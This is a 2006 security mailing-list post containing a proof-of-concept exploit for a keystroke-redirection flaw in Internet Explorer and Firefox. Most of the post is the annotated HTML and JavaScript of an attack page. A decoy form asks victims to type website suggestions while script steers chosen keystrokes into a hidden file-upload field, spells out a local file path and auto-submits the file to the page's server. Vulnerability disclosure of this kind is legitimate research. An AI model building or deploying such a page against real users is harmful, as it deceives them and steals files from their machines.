
InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)


From: sirdarckcat () gmail com
Date: 11 Jun 2006 09:37:33 -0000

This is a sample PoC exploit for the Internet Explorer and Mozilla Firefox security flaw described here:
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec. The flaw lets a web page redirect the victim's ordinary keystrokes into a hidden file-upload control, so the victim unknowingly "selects" a local file that the page then uploads.

The subjects suggested for the links are chosen so that the user is forced to type the fragments:
FILE
AUTOEXEC
BAT

Those keystrokes are redirected into the hidden file input and, together with the ':' and '/' characters (presumably typed as part of the "http://" prefixes the form asks for), spell out:
file://c:/autoexec.bat

which the form then uploads to the server.

This is a low-risk vulnerability: it requires the victim to type every character of the target path, in order, and the keyCode/Shift table used by the script is specific to one keyboard layout (a keyCode maps to different characters on other layouts). The receiving side (upload.php) is not shown here.

//--START HTML CODE--//
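<html>
<body>
<!-- Decoy form. The visible textarea is where the victim believes they are
     typing; the hidden, disabled file input below receives the redirected
     keystrokes (see the script). A file upload is only transmitted when the
     form uses multipart encoding, which is selected with the enctype
     attribute (a "type" attribute on <form> has no effect). -->
<form method=post action="upload.php" enctype="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<!-- Starts disabled (not focusable) and invisible; the keydown handler enables
     and focuses it only for the keystrokes it wants to capture. The 1x1 size
     keeps it inconspicuous while it is visible. -->
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>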
<script>
/**
*  OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
*               by sirdarckcat [at] gmail [.] com
*                   from:       elhacker.net
**/
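// Expected keystroke sequence, one entry per character of thefilew (22 entries):
//   thefilek[i] - keyCode that must arrive on keydown for character i
//   nidshift[i] - 1 if Shift must be held for that keyCode, 0 otherwise
// e.g. indexes 4 and 8 (':') expect keyCode 190 with Shift, index 18 ('.')
// expects keyCode 190 without it. keyCode -> character is keyboard-layout
// dependent, so this table only works on layouts where these codes produce
// the characters of thefilew (verify against the target's layout).
var nidshift = [0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
var thefilek = [70, 73, 76, 69, 190, 111, 111, 67, 190, 111, 65, 85, 84, 79, 69, 88, 69, 67, 190, 66, 65, 84];
// The path that is assembled, keystroke by keystroke, inside the file input;
// its characters are also echoed into the textarea so the typing looks normal.
var thefilew = "file://c:/autoexec.bat";
// Index of the next expected character; advanced only on a matching keydown.
var dv = 0;
// Whether Shift is currently held, maintained by the key handlers below.
var chift = false;
// teo: the hidden file input that receives redirected keystrokes.
// feo: the visible textarea the victim believes they are typing into.
var teo = document.forms[0].thet;
var feo = document.forms[0].other;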

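/**
 * keydown handler: redirects the victim's ordinary typing into the hidden
 * file input whenever the keystroke spells the next character of thefilew,
 * so the path is assembled in the file input without the victim ever
 * choosing a file.
 *
 * - A matching keydown (expected keyCode and matching Shift state) enables,
 *   shows and focuses the file input so the character lands there, and echoes
 *   the same character into the textarea so the page still looks like normal
 *   typing.
 * - Any other keydown (including Shift itself) disables/hides the file input
 *   and returns focus to the textarea. Progress (dv) is not reset, apparently
 *   so the path can be completed across several unrelated words.
 * - Once every character has been matched, the next keydown submits the form.
 *
 * @param {KeyboardEvent} tecla - the event; handlers in older IE are invoked
 *   without an argument, so window.event is used as a fallback.
 */
function checa(tecla) {
        var ev = tecla || window.event;
        var rt = ev.which ? ev.which : ev.keyCode;
        if (dv >= thefilew.length) {
                document.forms[0].submit();
        }
        if (rt === 16) {
                chift = true;
        }
        if (rt === thefilek[dv]) {
                // The Shift state must agree with the table entry for this character.
                var shiftOk = nidshift[dv] ? chift : !chift;
                if (shiftOk) {
                        teo.disabled = false;
                        teo.style.visibility = "visible";
                        teo.focus();
                        // charAt rather than thefilew[dv]: bracket indexing of
                        // strings yields undefined in the old IE versions targeted.
                        feo.value += thefilew.charAt(dv);
                        dv++;
                }
        } else {
                feo.focus();
                teo.disabled = true;
                teo.style.visibility = "hidden";
        }
}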
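/**
 * keyup handler: clears the Shift-held flag when the Shift key (keyCode 16)
 * is released. Every other key is ignored.
 *
 * @param {KeyboardEvent} tecla - the event; handlers in older IE are invoked
 *   without an argument, so window.event is used as a fallback.
 */
function solsh(tecla) {
        var ev = tecla || window.event;
        var rt = ev.which ? ev.which : ev.keyCode;
        if (rt === 16) {
                chift = false;
        }
}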
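/**
 * keypress handler: sets the Shift-held flag if a keypress reports keyCode 16.
 * In most browsers Shift alone does not generate keypress events (checa already
 * sets the flag on keydown), so this is a belt-and-braces Shift tracker.
 *
 * @param {KeyboardEvent} tecla - the event; handlers in older IE are invoked
 *   without an argument, so window.event is used as a fallback.
 */
function mprss(tecla) {
        var ev = tecla || window.event;
        var rt = ev.which ? ev.which : ev.keyCode;
        if (rt === 16) {
                chift = true;
        }
}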
// Register the handlers document-wide so keystrokes anywhere on the page are
// observed: keyup and keypress only track the Shift state, keydown performs
// the redirection into the file input.
document.onkeyup = solsh;
document.onkeypress = mprss;
document.onkeydown = checa;
</script>
</body>
</html>
//--END HTML CODE--//

Att.
Sirdarckcat
www.elhacker.net

